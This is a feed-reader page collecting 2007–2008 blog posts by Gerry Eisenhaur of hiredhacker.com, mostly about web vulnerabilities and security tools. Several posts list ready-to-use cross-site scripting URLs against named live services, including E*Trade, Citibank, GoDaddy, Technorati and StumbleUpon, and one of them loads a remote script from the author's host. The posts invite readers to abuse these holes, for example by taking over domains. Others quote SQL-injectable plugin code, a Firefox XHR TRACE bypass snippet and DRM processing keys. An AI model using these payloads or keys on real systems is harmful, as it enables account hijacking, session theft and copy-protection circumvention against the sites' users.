My Security Planet » Items by Gerry Eisenhaur

Feeds

6078 items (0 unread) in 72 feeds

• Jeremy Zawodny's blog
• Mozilla Webdev
• Transcendental Technical Travails
• Ian Bicking: a blog
• Hackosis

WebSecurity

• Watchfire Application Security Insider
• BlogSecurity
• sirdarckcat
• Google Online Security Blog
• CGISecurity.com: Your Web Site and Application Security Resource
• Switch/Twitch
• mybeNi websecurity
• cat slave diary
• SecuriTeam Blogs
• Curiouser and Curiouser
• Alex's Corner
• Billy (BK) Rios
• Chris Shiflett
• christian's weblog
• funkatron.com
• GNUCITIZEN
• The Spanner
• hackademix.net
• Ruby on Rails Security Project
• It's a shampoo world anyway
• Web Security Blog
• ha.ckers.org web application security lab
• Yet Another Infosec Blog
• PHP Security Blog
• Security Thoughts
• Sunnet Beskerming Security Advisories
• Disenchant's Blog
• Sylvan von Stuppe
• Larholm.com
• The Turkey Curse
• Jeremiah Grossman
• Anurag Agarwal - Application Security Evangelist
• Ivan Ristic
• deep inside | security & tools
• omg.wtf.bbq.
• BlueHat Security Briefings
• Tactical Web Application Security

Security

• tssci security
• Plynt Penetration Testing Blog
• Michael Howard's Web Log
• Security Retentive
• BindShell.Net
• Dominic White's .tHE pRODUCT
• SecurityFocus News
• Justice League
• Schneier on Security
• Rational Survivability
• terminal23
• 1 Raindrop
• hiredhacker.com
• Matasano Chargen
• Security Vulnerability Research & Defense
• Michael on Security - Musings on Information Security
• Fortify blog
• The Art of Software Security Assessment
• GDS Security Blog
• Vodun.org
• Robert Penz Blog
• Mark Curphey - SecurityBuddha.com
• Liminal states
• Security Ripcord
• ModSecurity Blog
• IBM Internet Security Systems Frequency X Blog
• Suspekt...

SEO

• SEO BlackHat: Black Hat SEO Blog
• busin3ss.name

Tools

• Opensourcetesting.org News

Items by Gerry Eisenhaur

hiredhacker.com

• 

  Fun with E*Trade

  Posted: November 4th, 2008, 1:21pm CST by Gerry Eisenhaur

  Tags:    [edit]

  Most of these require the user to be logged in, and for those who don’t know, the ‘expression’ technique only works on IE. You will need to use a different method if you want to test it on other browsers. See Rsnakes cheat sheet for exmaples. https://www.etrade.wallst.com/v1/stocks/snapshot/symbol_lookup.asp?textIn=%22%3E%3Cscript%20src=%22http://www.hiredhacker.com/xss.js%22%3E%3C/script%3E https://us.etrade.com/e/t/accounts/changemyivrpin?FROM_PAGE=changemypasswords%22+style=%22width:expression(alert(/owned/)) https://express.etrade.com/e/t/applogic/OLAMasterpage2?SC=NPNK4KV%22+style=%22width:expression(alert(/owned/)) https://us.etrade.com/e/t/user/login?TYPE=&REALMOID=&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=&TARGET=%22+style=%22width:expression(alert(/owned/)) https://global.etrade.com/e/t/intl/page?nav=3&subnav=4&screen=1%27;alert(/owned/);//&language=en&country=gl (nav and subnav are also vulnerable parameters)
• 

  StatPress/StatPress Reloaded - SQL Injections

  Posted: November 3rd, 2008, 10:36am CST by Gerry Eisenhaur

  Tags:    [edit]

  iriStatAppend() // URL (requested) $urlRequested = iri_StatPress_URL(); ... $referrer = (isset($_SERVER['HTTP_REFERER']) ? htmlentities($_SERVER['HTTP_REFERER']) : ''); ... $insert = "INSERT INTO " . $table_name . " (date, time, ip, urlrequested, agent, referrer, search,nation,os,browser,searchengine,spider,feed,user,timestamp) " . "VALUES ('$vdate','$vtime','$ipAddress','$urlRequested','" . addslashes(strip_tags($userAgent)) . "','$referrer','" . addslashes(strip_tags($search_phrase)) . "','" . iriDomain($ipAddress) . "','$os','$browser','$searchengine','$spider','$feed','$userdata->user_login','$timestamp')"; $results = $wpdb->query($insert); iri_StatPress_Vars() if (strpos(strtolower($body), "%thistotalvisits%") !== false) { $qry = $wpdb->get_results("SELECT count(DISTINCT(ip)) [...]
• 

  Technorati XSS

  Posted: November 2nd, 2008, 7:22am CST by Gerry Eisenhaur

  Tags:    [edit]

  If anyone is interested, Technorati is full of bugs like this. http://technorati.com/blogs/tag/%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.technorati.com/404please%27);alert(1);// http://www.technorati.com/search/%22%3E%3Cscript%3Ealert(1)%3C/script%3E [POST]http://www.technorati.com/account/bio/?bio_blurb=&company=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&zipcode=&country=US&func=updateuser
• 

  More StumbleUpon.com Bugs

  Posted: November 1st, 2008, 10:04am CDT by Gerry Eisenhaur

  Tags:    [edit]

  Free stumbles anyone? http://www.stumbleupon.com/recover.php?email=no%40no.com%22%3E%3Cscript%3Ealert(1);%3C/script%3E http://www.stumbleupon.com/find_friend.php?q=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
• 

  Citibank XSS

  Posted: October 31st, 2008, 10:29am CDT by Gerry Eisenhaur

  Tags:    [edit]

  http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=%2522%2522%253e%253cimg src=%2522%2522 onerror=%2522alert(1)%2522
• 

  Godaddy.com XSS

  Posted: October 30th, 2008, 5:07pm CDT by Gerry Eisenhaur

  Tags:    [edit]

  Anyone want to take over a few domains? https://dcc.godaddy.com/DccError.aspx?sa=%22+onerror%3d%27alert(1)%27+%22 https://dcc.godaddy.com/default.aspx?activeview=transfer&filtertype=3&sa=%22+onerror%3d%27alert(1)%27+%22 https://mya.godaddy.com/myaError.aspx?sa=%27%20onerror=%27alert(1) It’s scary how full of holes godaddy.com is, this is just a sample of what I saw while I was transferring my domains to webfaction.
• 

  New site layout and updates!

  Posted: October 30th, 2008, 10:25am CDT by Gerry Eisenhaur

  Tags:    [edit]

  I redesigned, well picked a new theme, and moved the site to a new hosting company today. I have been severily neglecting hiredhacker.com, but life has been filling my time up with ‘real’ things. I will try and post things from time to time, I just really hate writing. I don’t mind giving technical information or [...]
• 

  w3af - Web Application Attack and Audit Framework

  Posted: May 16th, 2008, 1:36pm CDT by Gerry Eisenhaur

  Tags:    [edit]

  w3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af is a great (and getting better) framework that I just decided to start contributing to. I want to get as much attention to these [...]
• 

  Manny being Manny

  Posted: May 16th, 2008, 10:18am CDT by Gerry Eisenhaur

  Tags:    [edit]

  A little off topic but if you are a fan of the Sox, or just like baseball you gotta see this. Here is Manny’s sprinting-wall-climbing-high-fiveing-double-play-catch from a few nights ago: http://www.mlb.com/media/video_sl.jsp?video=200805142699480
• 

  Oh yea, I have a blog…

  Posted: May 16th, 2008, 8:15am CDT by Gerry Eisenhaur

  Tags:    [edit]

  The past few months haven’t exactly been slow for me, hence the lack of new content here. There have been allot of interesting stuff to happen over the past 2 months, I will try to point out the ones I found most interesting. In no particular order (well, except for Mark Dowd’s inhuman paper, that [...]
• 

  Mantis Bug Tracker XSS

  Posted: March 1st, 2008, 3:52pm CST by Gerry Eisenhaur

  Tags:    [edit]

  ‘Mantis is a free popular web-based bugtracking system’ - http://www.mantisbt.org/ I didn’t audit this, I don’t want to audit this, I just found it while using Mantis. There may be more, but this is what I got: /view_filters_page.php?for_screen=1&target_field=show_category[]%22;alert(1);x=%22
• 

  Quick Update

  Posted: March 1st, 2008, 3:48pm CST by Gerry Eisenhaur

  Tags:    [edit]

  February was a very busy month for me, which makes it a slow month for hiredhacker.com. I did change hosts, but that was about it. Between the XBox 360, and my new iPhone I am lucky I even did any real work. Hopefully March will be a better month for hiredhacker and I will get [...]
• 

  PyMSRPC Released.

  Posted: February 6th, 2008, 1:56pm CST by Gerry Eisenhaur

  Tags:    [edit]

  pymsrpc is an attempt to develop a working library for communicating with remote Microsoft RPC endpoints. It includes an IDL parser and NDR data types for making requests. I wanted to get this up here in case you haven’t heard that Cody Pierce and Aaron Portnoy have released PyMSRPC. I personally have been very excited [...]
• 

  XSS in WP Contact Form III.

  Posted: February 2nd, 2008, 11:46am CST by Gerry Eisenhaur

  Tags:    [edit]

  The WP Contact Form III 1.4.1 WordPress plugin by ‘KristinKWangen’ is vulnerable to multiple cross site scripting attacks. Note to developers, this does not stop script injection attacks: From wp-contactform.php line 105: $_POST['wpcf_your_name'] = stripslashes(trim($_POST['wpcf_your_name'])); Also note that this is not a very good way to die: From buttonsnap.php line 28: $selection = isset($_POST['selection']) ? $_POST['selection'] : @$_GET['selection']; $selection = apply_filters($dispatch, $selection); die($selection);
• 

  Router Hacking Challenge.

  Posted: February 2nd, 2008, 9:38am CST by Gerry Eisenhaur

  Tags:    [edit]

  Ronald has started a router hacking challenge over on 0×000000.com. It’s an interesting topic, and something I have explored in the past with good results. Take a look and send him your findings.
• 

  MySQL Errors, Lag, and Downtime.

  Posted: February 1st, 2008, 1:16pm CST by Gerry Eisenhaur

  Tags:    [edit]

  Over the past few days I have been experiencing some intermediate problems with my hosting provider. They have been short term, random, and not that severe but none the less it pisses me off and annoys the shit out of me. Needless to say I will be switching providers over the weekend, so if there [...]
• 

  Keys…

  Posted: January 31st, 2008, 11:15am CST by Gerry Eisenhaur

  Tags:    [edit]

  iPhone Key: 18 84 58 A6 D1 50 34 DF E3 86 F2 3B 61 D4 37 74 HD-DVD Processing Key: 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 New AACS Processing Key: 45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2 Any More?
• 

  More Chrome Directory Traversing.

  Posted: January 30th, 2008, 11:25pm CST by Gerry Eisenhaur

  Tags:    [edit]

  Mozilla marked Bug ID 413250 as ‘RESOLVED FIXED’ on Tuesday. I got a chance to check out the fix today, and found that the fix is inadequate in stopping the attack. Here’s another demo that reads your session store, and like before, uses the Download Statusbar extension. steal_sessionstore2.html.
• 

  NotchUp.com

  Posted: January 30th, 2008, 7:04pm CST by Gerry Eisenhaur

  Tags:    [edit]

  If you haven’t played with NotchUp.com yet, you should take a look. It seems like a very promising site. I mean come on, who wouldn’t want to get paid to interview for a job? If you think it’s all small companies for small money, it’s not. Facebook and Google are both very active, making offers [...]
• 

  Firefox chrome: URL Handling Directory Traversal.

  Posted: January 19th, 2008, 2:35am CST by Gerry Eisenhaur

  Tags:    [edit]

  I spent some time tonight with scripting access to chrome files and found that Firefox doesn’t properly handle escaped characters. Its possible to load any javascript file on a victims machine. This attack is similar to previously disclosed vulnerabilities but is not constrained to basic Firefox files. To exploit this the victim needs to have [...]
• 

  OllyDbg 2.0 - Pre-alpha 3 Released.

  Posted: January 7th, 2008, 9:52am CST by Gerry Eisenhaur

  Tags:    [edit]

  This was released on Dec. 25th, and I am just getting around to posting it… such a slacker, anyway: http://www.ollydbg.de/version2.html
• 

  Exe_Dump_Utility, pefile online!

  Posted: January 6th, 2008, 8:09pm CST by Gerry Eisenhaur

  Tags:    [edit]

  Gregory Piñero has release Exe_Dump_Utility, a web enabled wrapper for pefile. pefile is obviously more powerful and robust, but its still very cool and worth looking at.
• 

  0day RealPlayer Exploit

  Posted: January 4th, 2008, 10:18pm CST by Gerry Eisenhaur

  Tags:    [edit]

  I grabbed this off of some hacked servers in China, nothing special but some people where asking for it. Drop me a line and I will email the actual html/js files if your interested. Sorry for the bad formatting, but you get the point.
• 

  WassUp WordPress Plugin Vulnerabilities.

  Posted: January 4th, 2008, 6:37pm CST by Gerry Eisenhaur

  Tags:    [edit]

  WassUp is a new Wordpress plugin to track your visitors in real time. It has a very readable and fancy admin console to keep tracks of your blog’s users visits. It has a “current visitors online” view and a more detailed “visitors details” view where you can know almost everything your users are doing on [...]
• 

  RSnake’s XSS Worm Contest

  Posted: January 4th, 2008, 4:08pm CST by Gerry Eisenhaur

  Tags:    [edit]

  RSnake has started a ‘Diminutive XSS Worm Replication Contest’ and in doing so has sparked a really interesting thread on sla.ckers.org. Definitely worth the read and to keep an eye on.
• 

  Some XSS’s for the New Year.

  Posted: January 4th, 2008, 3:20pm CST by Gerry Eisenhaur

  Tags:    [edit]

  Here ya go: StumbleUpon.com YouTube.com
• 

  TRACE requests via XMLHTTPRequest.

  Posted: December 16th, 2007, 5:12pm CST by Gerry Eisenhaur

  Tags:    [edit]

  I was looking over some of Mozilla’s XMLHTTPRequest code, and noticed this snippet at nsXMLHttpRequest.cpp:915 // Disallow HTTP/1.1 TRACE method (see bug 302489) // and MS IIS equivalent TRACK (see bug 381264) if (method.LowerCaseEqualsASCII("trace") || method.LowerCaseEqualsASCII("track")) { return NS_ERROR_INVALID_ARG; } Which lead me to do: var xhr = new XMLHttpRequest(); xhr.open('%trace', '/',false); xhr.send(''); alert(xhr.responseText); When I was testing I was using [...]
• 

  Hacking AOL

  Posted: December 13th, 2007, 2:01pm CST by Gerry Eisenhaur

  Tags:    [edit]

  I had some free time today and after about 10 minutes of poking around AOL’s web services, I came to the conclusion that their developers have no concept of security. Every AOL domain I looked at had multiple XSS holes on basically every page. They ranged from random subdomains like: http://autos.aol.com/ http://finance.aol.com/ To more serious domains like: http://webmail.aol.com/ (need [...]
• 

  Paterva releases Maltego GUI KZ3.

  Posted: December 7th, 2007, 8:41am CST by Gerry Eisenhaur

  Tags:    [edit]

  Maltego (formerly Evolution) is a great tool for examining relationships between entities (People, Domains, IP addresses, Files, etc). I first heard of Evolution during H.D. Moore’s and Valsmith’s ‘Tactical Exploitation’ talk (Paper, DefCon Video) at Blackhat 2007. Maltego is available as a standalone Java application or a Web based application. If anyone is interested I [...]
• 

  Python and Reverse Engineering.

  Posted: December 6th, 2007, 12:09am CST by Gerry Eisenhaur

  Tags:    [edit]

  Before I get into this post, I should give you a little background into what I do day-to-day. In a typical week I will do a large range of work mainly it revolves around reverse engineering, exploit development, vulnerability analysis, penetration testing, etc. The nature of my (and many other researchers in my shoes) work [...]
• 

  Updates to hiredhacker.com

  Posted: November 20th, 2007, 9:58pm CST by Gerry Eisenhaur

  Tags:    [edit]

  It’s been a long time coming, but we are finally getting around to upgrading hiredhacker.com. Over the next week or two you will notice some small and not so small changes happening.
• 

  Inter-Protocol Exploitation

  Posted: January 1st, 2000, 6:03pm CST by Gerry Eisenhaur

  Tags:    [edit]

  “Research within the area of web browser security, particularly Browser Exploitation Frameworks, Cross-site scripting Viruses and Inter-Protocol Communication has become a catalyst for further exploration into Inter-Protocol Exploitation. That is, an attack vector which encapsulates malicious data within a particular protocol in such a way that the resultant data stream is capable of exploiting a [...]
• 

  Off Topic: id’s resume rant.

  Posted: January 1st, 2000, 6:03pm CST by Gerry Eisenhaur

  Tags:    [edit]

  I was going through old bookmarks when I can across id’s rant on resumes. If you haven’t read it, your missing out. It is one of the funniest things I have ever read. http://www.fthe.net/blog/?p=13
• 

  WEP is dead.

  Posted: January 1st, 2000, 6:02pm CST by Gerry Eisenhaur

  Tags:    [edit]

  Researchers at Darmstadt Technical University in Germany have updated an attack at RC4 that enabled them to crack 104 bit WEP in under 60 seconds. Their full paper is available here.
• 

  MS Releases out of cycle patch for ANI vulnerability.

  Posted: January 1st, 2000, 6:02pm CST by Gerry Eisenhaur

  Tags:    [edit]

  Microsoft released a patch today to combat the recent ANI vulnerability along with 6 other critical vulnerabilities. Full details with patch download: http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx Warning: The patch is causing some problems for users of the Realtek HD Audio Control Panel, find out more here.
• 

  Indian security researchers subvert Vista’s code signing mechanisms.

  Posted: January 1st, 2000, 6:01pm CST by Gerry Eisenhaur

  Tags:    [edit]

  At BlackHat Amsterdam Nitin and Vipin Kumar released VBootkit which subverts Vista’s code signing mechanisms. Find out more here.